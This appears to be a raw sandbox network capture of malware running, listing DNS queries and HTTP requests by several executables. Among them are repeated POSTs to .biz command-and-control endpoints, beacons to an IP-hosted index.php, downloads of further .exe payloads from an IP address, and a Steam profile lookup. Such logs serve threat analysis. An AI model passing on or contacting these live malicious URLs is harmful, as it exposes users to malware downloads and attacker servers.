server-timing: cfL4;desc="?proto=TCP&rtt=50804&min_rtt=47108&rtt_var=16991&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=609&delivery_rate=78569&cwnd=253&unsent_bytes=0&cid=67458e59cf7a0084&ts=830&x=0"
DNS

166.165.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.165.67.172.in-addr.arpa

IN PTR

Response
DNS

se-blurry.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A

Response

se-blurry.biz

IN A

104.21.81.153

se-blurry.biz

IN A

172.67.162.65
POST

https://se-blurry.biz/api

2M4078.exe

Remote address:

104.21.81.153:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=t77q405in732gupjvlvg4eajvq; expires=Mon, 31-Mar-2025 20:03:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEgta8%2Fy0xbvCi72BnCjbDEkdEFHoZ7113eVpSlqHBek0VRoMeLT02SdAm2aP5AHmhCZuamnYsgUfMI8puWlwBgb0ebfULMVnRYJ%2BNUAgQg%2BFBOvpnDQ7v6mJnQ0mSlE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c699aebdbeb4-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49600&min_rtt=47220&rtt_var=13953&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3288&recv_bytes=599&delivery_rate=79367&cwnd=253&unsent_bytes=0&cid=f9ce394433378792&ts=576&x=0"
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

zinc-sneark.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

zinc-sneark.biz

IN A

Response

zinc-sneark.biz

IN A

172.67.136.167

zinc-sneark.biz

IN A

104.21.62.142
POST

https://zinc-sneark.biz/api

2M4078.exe

Remote address:

172.67.136.167:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=3u683q1d15ucurrobrb5t6t4b2; expires=Mon, 31-Mar-2025 20:03:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyvVExUMhOLl%2BCwFZj77s4IPrn5FIFBx%2BKFsYvrfxdetImsqE4bqsG%2BDSsF22Yd52Dnk9w%2Bl8a6UV8ooDV7gQB77e7X4GDUCToTXl4qmopzXZdufAn%2FX2yEf0lou0wjLpk0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c69e1fb5ef2f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47649&min_rtt=46710&rtt_var=11301&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3297&recv_bytes=603&delivery_rate=76854&cwnd=253&unsent_bytes=0&cid=371bff5f59bad0dd&ts=367&x=0"
DNS

153.81.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.81.21.104.in-addr.arpa

IN PTR

Response
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

43.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.113.215.185.in-addr.arpa

IN PTR

Response
DNS

dwell-exclaim.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

dwell-exclaim.biz

IN A

Response

dwell-exclaim.biz

IN A

172.67.153.96

dwell-exclaim.biz

IN A

104.21.88.210
POST

https://dwell-exclaim.biz/api

2M4078.exe

Remote address:

172.67.153.96:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dwell-exclaim.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7fhlk0thjvqhibfb2k0aalg714; expires=Mon, 31-Mar-2025 20:03:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NxZgA4dtNBLCi7NA5jAxv2lhSBSa761cK9f5Xx4CkWN6r4p3fFxFpyDu51XvhU0W3wqfBIXgEZXWc93l9fOdD7eakm%2Br01yeqI6X2b%2FoL%2FmFaA%2F2Gcy3UMhnS40eNj2wIbxZA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6a14acdf658-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50051&min_rtt=48885&rtt_var=11808&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=607&delivery_rate=77511&cwnd=253&unsent_bytes=0&cid=6756a521a387c1b3&ts=1884&x=0"
GET

http://31.41.244.11/files/7427009775/BhD8htX.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/7427009775/BhD8htX.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:48 GMT
Content-Type: application/octet-stream
Content-Length: 1823744
Last-Modified: Wed, 04 Dec 2024 15:54:54 GMT
Connection: keep-alive
ETag: "67507b4e-1bd400"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/151334531/i1A5m12.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/151334531/i1A5m12.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:51 GMT
Content-Type: application/octet-stream
Content-Length: 3540214
Last-Modified: Thu, 05 Dec 2024 12:33:42 GMT
Connection: keep-alive
ETag: "67519da6-3604f6"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/1818813749/wL3EGdM.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/1818813749/wL3EGdM.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:16:55 GMT
Content-Type: application/octet-stream
Content-Length: 7284070
Last-Modified: Fri, 06 Dec 2024 00:48:14 GMT
Connection: keep-alive
ETag: "675249ce-6f2566"
Accept-Ranges: bytes
GET

http://31.41.244.11/files/unique2/random.exe

skotes.exe

Remote address:

31.41.244.11:80

Request

GET /files/unique2/random.exe HTTP/1.1
Host: 31.41.244.11

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:45 GMT
Content-Type: application/octet-stream
Content-Length: 1945088
Last-Modified: Fri, 06 Dec 2024 00:56:10 GMT
Connection: keep-alive
ETag: "67524baa-1dae00"
Accept-Ranges: bytes
DNS

167.136.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.136.67.172.in-addr.arpa

IN PTR

Response
DNS

96.153.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

96.153.67.172.in-addr.arpa

IN PTR

Response
DNS

11.244.41.31.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.244.41.31.in-addr.arpa

IN PTR

Response
DNS

formy-spill.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

formy-spill.biz

IN A

Response

formy-spill.biz

IN A

172.67.173.74

formy-spill.biz

IN A

104.21.96.55
POST

https://formy-spill.biz/api

2M4078.exe

Remote address:

172.67.173.74:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: formy-spill.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=onkg82f9nb1ad0d5c5gjkr64sg; expires=Mon, 31-Mar-2025 20:03:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9oOtqe%2BkNyCpK3yNQqvGI7tHP%2FbqT0Erto8BCqxrLIt9wcvVbFriVd6PTimNqGDvCgRQOv1jrdKtNCuIJmy5NRGj0is1hkAf9Z1pypPAOCeLOTf%2B2Prz%2BXmvSAfTla596k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6ae0f8194f1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47769&min_rtt=47240&rtt_var=10779&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=79978&cwnd=253&unsent_bytes=0&cid=fdb515902ab1b8e6&ts=1847&x=0"
DNS

74.173.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.173.67.172.in-addr.arpa

IN PTR

Response
DNS

ratiomun.cyou

BhD8htX.exe

Remote address:

8.8.8.8:53

Request

ratiomun.cyou

IN A

Response
POST

https://se-blurry.biz/api

BhD8htX.exe

Remote address:

104.21.81.153:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=97b20vk5aco75sp8d185isfucn; expires=Mon, 31-Mar-2025 20:03:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdRJlyJ0iR1h87FjVebn8irzj6xtvZ7lviGegQ89bXXPMGlOJ3TCf5LF%2F6ex8YVdPItePnJo05qjasLxya5INwBGmAumpypQsX4tOFlzmKL00gS3C25nDsK5i4yYy1WM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6b5ae5894a6-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50645&min_rtt=46969&rtt_var=17112&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3289&recv_bytes=599&delivery_rate=83046&cwnd=253&unsent_bytes=0&cid=ed8588ed44464fdc&ts=1573&x=0"
DNS

covery-mover.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

covery-mover.biz

IN A

Response

covery-mover.biz

IN A

172.67.206.64

covery-mover.biz

IN A

104.21.58.186
POST

https://covery-mover.biz/api

2M4078.exe

Remote address:

172.67.206.64:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=5kt6n0hirdgcaoc6k1mv87k070; expires=Mon, 31-Mar-2025 20:03:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGc6PlAZYnl0AnjJYJPqM3NKJ0%2FaZAV2yKzjCFNH2U%2B2xUZWD4C8uJAsMf%2F0Dy5n8nZKsMuEq82QCe3AOmptyn2BtpTf726ln%2FhHnHSWHnGozFULakW5FwA7adS1ae7KHYue"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6ba9d18651f-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50893&min_rtt=47007&rtt_var=15886&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=70150&cwnd=253&unsent_bytes=0&cid=178e41ad20492377&ts=1219&x=0"
POST

https://zinc-sneark.biz/api

BhD8htX.exe

Remote address:

172.67.136.167:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=srk3islcb5kvdl4sdk17gebtjg; expires=Mon, 31-Mar-2025 20:03:31 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O6g%2FPSIh2%2B%2Fz6w0N6ptA3xxSvCyh5OHBDpCa%2FA2bG3HBLh2VuGHKqYe7Ws%2BX2iil382Q4S26FhUUKkeyRhDV7nPKL0bUZq4lbAqdmsvCAC5q8Jf27MzxNw%2F1WXuXviRilA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6c00ed2bd7e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49729&min_rtt=46930&rtt_var=14383&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=75632&cwnd=253&unsent_bytes=0&cid=2ff4518f43808684&ts=1087&x=0"
DNS

dare-curbys.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

dare-curbys.biz

IN A

Response

dare-curbys.biz

IN A

104.21.43.156

dare-curbys.biz

IN A

172.67.181.44
POST

https://dare-curbys.biz/api

2M4078.exe

Remote address:

104.21.43.156:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dare-curbys.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=9pmmod91l35ghlqg4g8u1mmnmu; expires=Mon, 31-Mar-2025 20:03:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fB%2B3vv%2BZklNL7Qvh8zq%2BgkEmAf%2BRUfnUweDL%2B7weg%2F1NeEsiP4ycusr4NiiJKjm3M6wdOnfkgUb%2BZLBoh58fqJgtZodXqO%2FPM6w4xY0LpPAx2kttyXtVPEaoPLbVN2Z3Mp8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6c31d2d953b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48006&min_rtt=46940&rtt_var=11491&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=603&delivery_rate=77931&cwnd=253&unsent_bytes=0&cid=b3288f99122baf2e&ts=894&x=0"
DNS

64.206.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.206.67.172.in-addr.arpa

IN PTR

Response
DNS

156.43.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

156.43.21.104.in-addr.arpa

IN PTR

Response
POST

https://dwell-exclaim.biz/api

BhD8htX.exe

Remote address:

172.67.153.96:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dwell-exclaim.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=pc6rsuh4j3arn6m8igrop1h6or; expires=Mon, 31-Mar-2025 20:03:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4osCi0MPw3ZAwyjOzZvKzzHKv7OmpU%2FHguCj8YOqcs1pz1dCkY3RD8seBPqCJNmBvbaXhnjnGlgjhl6GtO6P%2BMZvQBCfoSwoM3uKs85G1s5Wl7hK8lUd0xbyJrVgholBhi2wA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6c79cb78889-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47374&min_rtt=46958&rtt_var=10547&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3303&recv_bytes=607&delivery_rate=83870&cwnd=253&unsent_bytes=0&cid=07fc962e5cf00183&ts=599&x=0"
DNS

print-vexer.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

print-vexer.biz

IN A

Response

print-vexer.biz

IN A

104.21.35.246

print-vexer.biz

IN A

172.67.181.192
POST

https://print-vexer.biz/api

2M4078.exe

Remote address:

104.21.35.246:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: print-vexer.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=2skb3m9845b04niu939f3fju1k; expires=Mon, 31-Mar-2025 20:03:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kwzq4JCV2eQh6Qx7cOoYXhKbRVzxsgKFPnDVfdsvE7omfl0xJ9nNId4IJOzybukU8q56NN3HBA9IYZadXDuVRyT2lN0iTzvJQNPfHEqbigf4Su81m1sdTDmzRV30xoHxBYA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6ca2d20417d-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=58563&min_rtt=51482&rtt_var=23087&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=61703&cwnd=253&unsent_bytes=0&cid=a86ce4732f9231dc&ts=657&x=0"
POST

https://formy-spill.biz/api

BhD8htX.exe

Remote address:

172.67.173.74:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: formy-spill.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=6gv6haa99ojcga74g561pqg5ap; expires=Mon, 31-Mar-2025 20:03:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJEoMFib%2BPnX8l4GijQdIAVDw4VtNX40enwYMYU7iZm2rncZLqKGmAYOU23KiLgIKKm7kNtkS950C3Qbqprex01FHpZaLQKyZDT2UMw4XrQ2nctyNJ6sLVOIG3VH8Umbtho%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6cc1bd89413-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=56158&min_rtt=50246&rtt_var=15574&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=80860&cwnd=253&unsent_bytes=0&cid=e4682622ecaaa826&ts=693&x=0"
DNS

246.35.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

246.35.21.104.in-addr.arpa

IN PTR

Response
DNS

impend-differ.biz

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

impend-differ.biz

IN A

Response
DNS

steamcommunity.com

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
GET

https://steamcommunity.com/profiles/76561199724331900

2M4078.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
